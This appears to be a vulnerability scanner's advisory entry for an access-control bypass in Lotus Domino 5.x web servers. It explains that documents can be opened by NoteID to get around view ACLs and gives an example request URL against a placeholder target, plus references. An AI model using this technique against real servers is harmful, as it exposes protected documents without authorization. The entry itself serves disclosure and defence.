| VID |
22063 |
| Severity |
30 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
WWW |
| Detailed Description |
The Lotus Domino web server contains a 'View' ACL bypass vulnerability.
Lotus Domino is an application server developed by IBM. One of it's features is that it allows for remote user interaction with a Lotus Notes database via a web-based interface.
Lotus Notes documents can be organized into 'Views' in Lotus Domino. To protect sensitive documents, it is possible to place ACLs on views and all documents within them. Lotus Domino 5.x contain a vulnerability in that it is possible to access any Notes document from any view simply by manually specifying the document NoteID.
As an example of this examine the Statistics Reporting database, statrep.nsf.
If you open the Events view like:
http://target/statrep.nsf/136/?OpenView
You can see some documents. (136 is the NoteID of the Events view)
* References:
http://www.securityfocus.com/bid/3489
http://www.securiteam.com/securitynews/6W0030U35W.html |
| Recommendation |
Apply ACLs(Access Control List) to a view, and the documents in that view are also protected. |
| Related URL |
(CVE) |
| Related URL |
(SecurityFocus) |
| Related URL |
(ISS) |
|
